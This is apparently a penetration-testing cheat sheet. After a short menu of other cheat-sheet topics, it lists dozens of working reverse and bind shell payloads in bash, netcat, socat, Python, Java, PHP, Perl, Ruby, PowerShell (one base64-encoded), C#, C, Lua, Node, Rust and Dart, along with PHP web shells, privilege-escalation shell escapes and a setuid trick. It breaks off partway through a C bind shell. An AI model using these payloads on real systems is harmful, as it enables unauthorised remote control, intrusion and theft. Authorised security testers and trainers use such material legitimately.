Collection of possible ways to discover Local File Inclusion vulnerabilities and if possible discover how to elevate them to Remote Code Executions.
Check it OutCollection of commands that can be used to enumerate information from different TCP and UDP type services.
Check it OutCollection of commands that can be used to fuzz a website, discover information, or crack passwords.
Check it OutList of typical files you may want to explore when a directory traversal is discovered alongside discovery methods.
Check it OutCollection of different commands that can be used to transfer files from one device to another.
Check it OutCollection of commands used for generating certificates or performing attacks.
Check it OutCollection of SQL commands, SQL injection discovery methods and sqlmap commands.
Check it OutCollection of XML External Entity (XXE) Injections and discovery methods.
Check it OutCollection of Cross Site Scripting (XSS) tests that can be used to discover XSS vulnerabilities.
Check it OutCollection of filtering queries and capture commands to use in packet capture and analysis.
Check it OutCollection of commands to modify application firewalls or bypass network firewalls.
Check it OutCollection of commands to manage users and groups through different services and protocols.
Check it OutCollection of commands to communicate with and enumerate information from Azure and the Microsoft Graph API.
Check it Out# OhMyZSH breaks this trick, using sh is recommended # Using STTY # In reverse shell start a PTY $ python3 -c 'import pty;pty.spawn("/bin/bash")' Ctrl-Z # Backgrounds the shell # Execute commands which will be on your machine, not in the shell $ stty raw -echo $ fg # Brings backgrounded shell to active foreground # In your shell now execute $ reset $ export SHELL=bash $ export TERM=xterm-256color $ stty -raw echo OR $ stty rows <num> columns <cols>
# Bash UDP Start Listener nc -u -lvp 4444 # Establish UDP Shell Connection sh -i >& /dev/udp/127.0.0.1/4444 0>&1
# Bash TCP Start Listener nc -lvnp 4444 # Establish TCP Shell Connection sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
/bin/bash -l > /dev/tcp/127.0.0.1/4444 0<&1 2>&1
0<&196;exec 196<>/dev/tcp/127.0.0.1/4444; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/127.0.0.1/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
sh -i 5<> /dev/tcp/127.0.0.1/4444 0<&5 1>&5 2>&5
sh -i >& /dev/udp/127.0.0.1/4444 0>&1
sqlite3 /dev/null '.shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f'
# OpenBSD rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f
# OpenBSD 2 rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 1337 >/tmp/f
nc 127.0.0.1 4444 -e bash
nc.exe 127.0.0.1 4444 -e bash
busybox nc 127.0.0.1 4444 -e bash
nc -c sh 127.0.0.1 4444
ncat 127.0.0.1 4444 -e bash
ncat --udp 127.0.0.1 1337 -e /bin/bash
ncat.exe 127.0.0.1 4444 -e bash
public class shell { public static void main(String[] args) { Process p; try { p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"); p.waitFor(); p.destroy(); } catch (Exception e) {} } }
public class shell { public static void main(String[] args) { ProcessBuilder pb = new ProcessBuilder("bash", "-c", "$@| bash -i >& /dev/tcp/127.0.0.1/4444 0>&1") .redirectErrorStream(true); try { Process p = pb.start(); p.waitFor(); p.destroy(); } catch (Exception e) {} } }
import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class shell { public static void main(String[] args) { String host = "127.0.0.1"; int port = 4444; String cmd = "sh"; try { Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s = new Socket(host, port); InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream(); OutputStream po = p.getOutputStream(), so = s.getOutputStream(); while (!s.isClosed()) { while (pi.available() > 0) so.write(pi.read()); while (pe.available() > 0) so.write(pe.read()); while (si.available() > 0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e) {} } p.destroy(); s.close(); } catch (Exception e) {} } }
socat TCP:127.0.0.1:4444 EXEC:sh
socat TCP:127.0.0.1:4444 EXEC:'sh',pty,stderr,setsid,sigint,sane
# Start Listener and use -d for verbosity socat TCP4-LISTEN:443 STDOUT # Connect to Listener socat TCP4-LISTEN:443 STDOUT
# SOCAT ENCRYPTED REVERSE SHELL # Start Listener socat -d -d OPENSSL-LISTEN:443,cert=bind.pem,verify=0,fork STDOUT # Connect shell LINUX: socat OPENSSL:127.0.0.1:443,verify=0 EXEC:/bin/bash WINDOWS: socat OPENSSL:127.0.0.1:443,verify=0 EXEC:'cmd.exe',pipes
# USE SOCAT FROM ONLINE BINARY user@attack$ socat file:`tty`,raw,echo=0 TCP-L:1337 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:4444 user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:1337
export RHOST="127.0.0.1";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
python -c export RHOST="127.0.0.1";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
python -c import os,socket,subprocess,threading; def s2p(s, p): while True: data = s.recv(1024) if len(data) > 0: p.stdin.write(data) p.stdin.flush() def p2s(s, p): while True: s.send(p.stdout.read(1)) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("127.0.0.1",4444)) p=subprocess.Popen(["sh"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) s2p_thread = threading.Thread(target=s2p, args=[s, p]) s2p_thread.daemon = True s2p_thread.start() p2s_thread = threading.Thread(target=p2s, args=[s, p]) p2s_thread.daemon = True p2s_thread.start() try: p.wait() except KeyboardInterrupt: s.close()
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("127.0.0.1",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
# Windows Python2 python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('127.0.0.1', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
# Windows Python3 python3.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('127.0.0.1',4444));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()"
# IPv6 Python python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4444,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
# IPv6 Python No Spaces Shorthand python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4444,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
String command = "var host = '127.0.0.1';" + "var port = 4444;" + "var cmd = 'sh';"+ "var s = new java.net.Socket(host, port);" + "var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+ "var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+ "var po = p.getOutputStream(), so = s.getOutputStream();"+ "print ('Connected');"+ "while (!s.isClosed()) {"+ " while (pi.available() > 0)"+ " so.write(pi.read());"+ " while (pe.available() > 0)"+ " so.write(pe.read());"+ " while (si.available() > 0)"+ " po.write(si.read());"+ " so.flush();"+ " po.flush();"+ " java.lang.Thread.sleep(50);"+ " try {"+ " p.exitValue();"+ " break;"+ " }"+ " catch (e) {"+ " }"+ "}"+ "p.destroy();"+ "s.close();"; String x = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\""+command+"\")"; ref.add(new StringRefAddr("x", x);
user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4444 or user@attack$ ncat --ssl -vv -l -p 4444 user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4444 > /tmp/s; rm /tmp/s
String host="127.0.0.1"; int port=4444; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
String host="127.0.0.1";int port=4444;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
# Shell Method </bin/sh -i # Python Methods python3 -c 'import pty; pty.spawn("/bin/sh")' python3 -c "__import__('pty').spawn('/bin/bash')" python3 -c "__import__('subprocess').call(['/bin/bash'])" echo os.system('/bin/bash') # Perl Methods perl -e 'exec "/bin/sh";' perl: exec "/bin/sh"; perl -e 'print `/bin/bash`' # Ruby Method ruby: exec "/bin/sh" # Lua Method lua: os.execute('/bin/sh') # Linux Binary Methods # In Vim or Vi text editor vim filename.txt # Opens vim text editor # Press the [ESC] key to enter vi command mode :!bash # Type this command and hit [ENTER] :set shell=/bin/bash:shell # Type this command and hit [ENTER] vim.tiny # Press [ESC] key :set shell=/bin/sh :shell # Type this command and hit [ENTER] vim.basic /root/.bashrc # Nmap Method nmap: !sh nmap --interactive # MySQL Method mysql: ! bash # Less Method less /etc/passwd; !/bin/sh # Which Method which cp; ls -al /bin/cp; chmod u+s /bin/cp # Socat Method # WARNING # Launch /bin/bash in Kali if your default shell is /bin/zsh socat file:`tty`,raw,echo=0 tcp-listen:4444 # On Victim socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:4444
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?=`$_GET[0]`?>
php -r '$sock=fsockopen("127.0.0.1",4444);exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("127.0.0.1",4444);shell_exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("127.0.0.1",4444);system("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("127.0.0.1",4444);passthru("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("127.0.0.1",4444);`sh <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("127.0.0.1",4444);popen("sh <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("127.0.0.1",4444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
# On Linux perl -e 'use Socket;$i="127.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'</span>
# On Linux 2 perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# On Windows perl -MIO0 -e '$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'</span>
# Ruby Linux 1 ruby -rsocket -e ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("127.0.0.1",4444))'
# Ruby Linux 2 ruby -rsocket -e ruby -rsocket -e'exit if fork;c=TCPSocket.new("127.0.0.1","4444");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'
# Ruby Windows ruby -rsocket -e 'c=TCPSocket.new("127.0.0.1","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
$LHOST = "127.0.0.1"; $LPORT = 4444; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"</span>
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.1', 4444);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"</span>
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.1', 4444);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.1', 4444);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
using System; using System.Text; using System.IO; using System.Diagnostics; using System.ComponentModel; using System.Linq; using System.Net; using System.Net.Sockets; namespace ConnectBack { public class Program { static StreamWriter streamWriter; public static void Main(string[] args) { using(TcpClient client = new TcpClient("127.0.0.1", 4444)) { using(Stream stream = client.GetStream()) { using(StreamReader rdr = new StreamReader(stream)) { streamWriter = new StreamWriter(stream); StringBuilder strInput = new StringBuilder(); Process p = new Process(); p.StartInfo.FileName = "sh"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); //strInput.Append("\n"); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } } }
using System; using System.Diagnostics; namespace BackConnect { class ReverseBash { public static void Main(string[] args) { Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "sh"; proc.StartInfo.Arguments = "-c \"sh -i >& /dev/tcp/127.0.0.1/4444 0>&1\""; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); while (!proc.StandardOutput.EndOfStream) { Console.WriteLine(proc.StandardOutput.ReadLine()); } } } }
TF=$(mktemp -u); mkfifo $TF && telnet 127.0.0.1 4444 0<$TF | /bin/sh 1>$TF
C='curl -Ns telnet://127.0.0.1:4444'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null
#include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <stdlib.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void){ int port = 4444; struct sockaddr_in revsockaddr; int sockt = socket(AF_INET, SOCK_STREAM, 0); revsockaddr.sin_family = AF_INET; revsockaddr.sin_port = htons(port); revsockaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)); dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2); char * const argv[] = {"sh", NULL}; execve("sh", argv, NULL); return 0; }
# Compile Above Code gcc /tmp/shell.c --output csh && csh
lua -e "require('socket');require('os');t=socket.tcp();t:connect('127.0.0.1','4444');os.execute('sh -i <&3 >&3 2>&3');"
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
require('child_process').exec('nc -e sh 127.0.0.1 4444')
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("sh", []); var client = new net.Socket(); client.connect(4444, "127.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })();
use std::net::TcpStream; use std::os::unix::io::{AsRawFd, FromRawFd}; use std::process::{Command, Stdio}; fn main() { let s = TcpStream::connect("127.0.0.1:4444").unwrap(); let fd = s.as_raw_fd(); Command::new("/bin/sh") .arg("-i") .stdin(unsafe { Stdio::from_raw_fd(fd) }) .stdout(unsafe { Stdio::from_raw_fd(fd) }) .stderr(unsafe { Stdio::from_raw_fd(fd) }) .spawn() .unwrap() .wait() .unwrap(); }
import 'dart:io'; import 'dart:convert'; main() { Socket.connect("127.0.0.1", 4444).then((socket) { socket.listen((data) { Process.start('powershell.exe', []).then((Process process) { process.stdin.writeln(new String.fromCharCodes(data).trim()); process.stdout .transform(utf8.decoder) .listen((output) { socket.write(output); }); }); }, onDone: () { socket.destroy(); }); }); }
# Python3 Bind python3 -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",4444));s1.listen(1);c,a=s1.accept(); while True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
# Netcat Linux Bind nc -nlvp 51337 -e /bin/bash
# Netcat OpenBSD Bind rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
# Perl Bind Shell perl -e 'use Socket;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/sh -i");};'
# PHP Bind Shell php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",4444);socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}'
# Powercat Bind Shell # Start Bind Listener .\powercat.ps1 # Imports tool powercat -l -p 4444 -ep # Connect to Bind .\powercat.ps1 # Imports tool powercat -c 127.0.0.1 -p 4444
# Ruby Bind ruby -rsocket -e 'f=TCPServer.new(4444);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <arpa/inet.h> #include <sys/socket.h> //#include <sys/types.h> #define SHELL "/bin/bash" // shell to spawn when connection is received int main(int argc, char *argv[]) { char msg[512]; int srv_sockfd, new_sockfd; socklen_t new_addrlen; struct sockaddr_in srv_addr, new_addr; if(argc != 2) { printf("\nusage: ./tcpbind <listen port>\n"); return -1; } if(fork() == 0) { if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0) { perror("[error] socket() failed!"); return -1; } srv_addr.sin_family = PF_INET; srv_addr.sin_port = htons(atoi(argv[1])); srv_addr.sin_addr.s_addr = htonl(INADDR_ANY); if(bind(srv_sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)) < 0) { perror("[error] bind() failed!"); return -1; } if(listen(srv_sockfd, 1) < 0) { perror("[error] listen() failed!"); return -1; } for(;;) { new_addrlen = sizeof(new_addr); new_sockfd = accept(srv_sockfd, (struct sockaddr *)&new_addr, &new_addrlen); if(new_sockfd < 0) { perror("[error] accept() failed!"); return -1; } if(fork() == 0) { close(srv_sockfd); write(new_sockfd, msg, strlen(msg)); dup2(new_sockfd, 2); dup2(new_sockfd, 1); dup2(new_sockfd, 0); 